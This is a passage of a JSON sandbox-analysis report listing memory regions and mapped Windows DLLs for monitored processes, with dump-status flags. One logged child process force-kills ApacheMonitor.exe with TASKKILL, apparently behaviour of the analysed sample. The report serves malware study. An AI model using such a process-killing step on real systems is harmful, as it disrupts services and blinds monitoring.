2555903, "entry_point": 0, "filename": null, "id": "region_1862", "name": "private_0x0000000000230000", "norm_filename": null, "region_type": "private_memory", "start_va": 2293760, "timestamp": "00:01:15.493", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 311296, "start_va": 1242497024, "type": "region", "version": 1 }, "end_va": 1242808319, "entry_point": 1242530458, "filename": "\\Windows\\SysWOW64\\cmd.exe", "id": "region_1863", "name": "cmd.exe", "norm_filename": "c:\\windows\\syswow64\\cmd.exe", "region_type": "memory_mapped_file", "start_va": 1242497024, "timestamp": "00:01:15.493", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2003566592, "type": "region", "version": 1 }, "end_va": 2005307391, "entry_point": 2003566592, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1864", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2003566592, "timestamp": "00:01:15.494", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 2005532672, "type": "region", "version": 1 }, "end_va": 2007105535, "entry_point": 2005532672, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_1865", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2005532672, "timestamp": "00:01:15.494", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_1866", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:01:15.495", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_1867", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:01:15.495", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_1868", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:01:15.495", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_1869", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:01:15.495", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1870", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:15.495", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_1871", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:15.495", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_1872", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:01:15.495", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 3407872, "type": "region", "version": 1 }, "end_va": 3932159, "entry_point": 0, "filename": null, "id": "region_1873", "name": "private_0x0000000000340000", "norm_filename": null, "region_type": "private_memory", "start_va": 3407872, "timestamp": "00:01:15.500", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1945960448, "type": "region", "version": 1 }, "end_va": 1945993215, "entry_point": 1945968888, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_1874", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1945960448, "timestamp": "00:01:15.500", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1946025984, "type": "region", "version": 1 }, "end_va": 1946402815, "entry_point": 1946285976, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_1875", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1946025984, "timestamp": "00:01:15.501", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1946419200, "type": "region", "version": 1 }, "end_va": 1946677247, "entry_point": 1946607224, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_1876", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1946419200, "timestamp": "00:01:15.501", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2001338368, "type": "region", "version": 1 }, "end_va": 2002362367, "entry_point": 0, "filename": null, "id": "region_1877", "name": "private_0x00000000774a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2001338368, "timestamp": "00:01:15.502", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2002386944, "type": "region", "version": 1 }, "end_va": 2003562495, "entry_point": 0, "filename": null, "id": "region_1878", "name": "private_0x00000000775a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2002386944, "timestamp": "00:01:15.502", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1879", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:15.689", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1880", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:15.689", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 880639, "entry_point": 458752, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1881", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 458752, "timestamp": "00:01:15.689", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 4784128, "type": "region", "version": 1 }, "end_va": 5832703, "entry_point": 0, "filename": null, "id": "region_1882", "name": "private_0x0000000000490000", "norm_filename": null, "region_type": "private_memory", "start_va": 4784128, "timestamp": "00:01:15.690", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 7143424, "type": "region", "version": 1 }, "end_va": 7208959, "entry_point": 0, "filename": null, "id": "region_1883", "name": "private_0x00000000006d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 7143424, "timestamp": "00:01:15.690", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 1945829376, "type": "region", "version": 1 }, "end_va": 1945858047, "entry_point": 1945834032, "filename": "\\Windows\\SysWOW64\\winbrand.dll", "id": "region_1884", "name": "winbrand.dll", "norm_filename": "c:\\windows\\syswow64\\winbrand.dll", "region_type": "memory_mapped_file", "start_va": 1945829376, "timestamp": "00:01:15.690", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1967063040, "type": "region", "version": 1 }, "end_va": 1967112191, "entry_point": 1967067361, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_1885", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1967063040, "timestamp": "00:01:15.690", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1967128576, "type": "region", "version": 1 }, "end_va": 1967521791, "entry_point": 1967236019, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_1886", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1967128576, "timestamp": "00:01:15.690", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1968832512, "type": "region", "version": 1 }, "end_va": 1969537023, "entry_point": 1968874610, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_1887", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1968832512, "timestamp": "00:01:15.691", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1983840256, "type": "region", "version": 1 }, "end_va": 1984495615, "entry_point": 1983924709, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_1888", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1983840256, "timestamp": "00:01:15.691", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1985085440, "type": "region", "version": 1 }, "end_va": 1986199551, "entry_point": 1985163987, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_1889", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985085440, "timestamp": "00:01:15.692", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1986592768, "type": "region", "version": 1 }, "end_va": 1987575807, "entry_point": 1986659689, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_1890", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1986592768, "timestamp": "00:01:15.692", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1989804032, "type": "region", "version": 1 }, "end_va": 1989906431, "entry_point": 1989822837, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_1891", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1989804032, "timestamp": "00:01:15.693", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1992884224, "type": "region", "version": 1 }, "end_va": 1993527295, "entry_point": 1993097175, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_1892", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1992884224, "timestamp": "00:01:15.693", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1995046912, "type": "region", "version": 1 }, "end_va": 1995087871, "entry_point": 1995060896, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_1893", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1995046912, "timestamp": "00:01:15.694", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1999372288, "type": "region", "version": 1 }, "end_va": 1999659007, "entry_point": 1999402104, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_1894", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1999372288, "timestamp": "00:01:15.694", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1999699968, "type": "region", "version": 1 }, "end_va": 2000748543, "entry_point": 1999812333, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_1895", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1999699968, "timestamp": "00:01:15.694", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 2000748544, "type": "region", "version": 1 }, "end_va": 2001338367, "entry_point": 2000839491, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_1896", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 2000748544, "timestamp": "00:01:15.695", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_1897", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:15.695", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1898", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:15.696", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 7208960, "type": "region", "version": 1 }, "end_va": 8814591, "entry_point": 0, "filename": null, "id": "region_1899", "name": "pagefile_0x00000000006e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7208960, "timestamp": "00:01:15.698", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1987969024, "type": "region", "version": 1 }, "end_va": 1988362239, "entry_point": 1988040079, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_1900", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1987969024, "timestamp": "00:01:15.698", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1998520320, "type": "region", "version": 1 }, "end_va": 1999355903, "entry_point": 1998526091, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_1901", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1998520320, "timestamp": "00:01:15.699", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 225279, "entry_point": 0, "filename": null, "id": "region_1902", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:15.704", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 925695, "entry_point": 0, "filename": null, "id": "region_1903", "name": "pagefile_0x00000000000e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 917504, "timestamp": "00:01:15.704", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2031616, "type": "region", "version": 1 }, "end_va": 2035711, "entry_point": 0, "filename": null, "id": "region_1904", "name": "private_0x00000000001f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2031616, "timestamp": "00:01:15.704", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2097152, "type": "region", "version": 1 }, "end_va": 2101247, "entry_point": 0, "filename": null, "id": "region_1905", "name": "private_0x0000000000200000", "norm_filename": null, "region_type": "private_memory", "start_va": 2097152, "timestamp": "00:01:15.704", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 8847360, "type": "region", "version": 1 }, "end_va": 10424319, "entry_point": 0, "filename": null, "id": "region_1906", "name": "pagefile_0x0000000000870000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8847360, "timestamp": "00:01:15.704", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 10485760, "type": "region", "version": 1 }, "end_va": 31457279, "entry_point": 0, "filename": null, "id": "region_1907", "name": "pagefile_0x0000000000a00000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 10485760, "timestamp": "00:01:15.704", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 3420160, "start_va": 31457280, "type": "region", "version": 1 }, "end_va": 34877439, "entry_point": 0, "filename": null, "id": "region_1908", "name": "pagefile_0x0000000001e00000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 31457280, "timestamp": "00:01:15.704", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 2162688, "type": "region", "version": 1 }, "end_va": 2228223, "entry_point": 0, "filename": null, "id": "region_1909", "name": "private_0x0000000000210000", "norm_filename": null, "region_type": "private_memory", "start_va": 2162688, "timestamp": "00:01:15.736", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 34930688, "type": "region", "version": 1 }, "end_va": 37875711, "entry_point": 34930688, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_1910", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 34930688, "timestamp": "00:01:15.749", "type": "region", "version": 1 } ], "terminate_reason": "timeout", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "TASKKILL /F /IM ApacheMonitor.exe /IM ApacheMonitor.exe ", "filename": "c:\\windows\\syswow64\\taskkill.exe", "id": "proc_11", "image_name": "taskkill.exe", "monitor_reason": "child_process", "monitored_id": 11, "origin_monitor_id": 10, "ref_parent_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1911", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:15.860", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_1912", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:15.860", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1913", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:01:15.860", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_1914", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:01:15.863", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 397311, "entry_point": 0, "filename": null, "id": "region_1915", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:01:15.863", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 1638399, "entry_point": 0, "filename": null, "id": "region_1916", "name": "private_0x0000000000150000", "norm_filename": null, "region_type": "private_memory", "start_va": 1376256, "timestamp": "00:01:15.863", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1638400, "type": "region", "version": 1 }, "end_va": 1728511, "entry_point": 1638400, "filename": "\\Windows\\SysWOW64\\taskkill.exe", "id": "region_1917", "name": "taskkill.exe", "norm_filename": "c:\\windows\\syswow64\\taskkill.exe", "region_type": "memory_mapped_file", "start_va": 1638400, "timestamp": "00:01:15.863", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2490368, "type": "region", "version": 1 }, "end_va": 2752511, "entry_point": 0, "filename": null, "id": "region_1918", "name": "private_0x0000000000260000", "norm_filename": null, "region_type": "private_memory", "start_va": 2490368, "timestamp": "00:01:15.868", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2003566592, "type": "region", "version": 1 }, "end_va": 2005307391, "entry_point": 2003566592, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1919", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2003566592, "timestamp": "00:01:15.868", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 2005532672, "type": "region", "version": 1 }, "end_va": 2007105535, "entry_point": 2005532672, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_1920", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2005532672, "timestamp": "00:01:15.869", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_1921", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:01:15.869", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_1922", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:01:15.869", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ 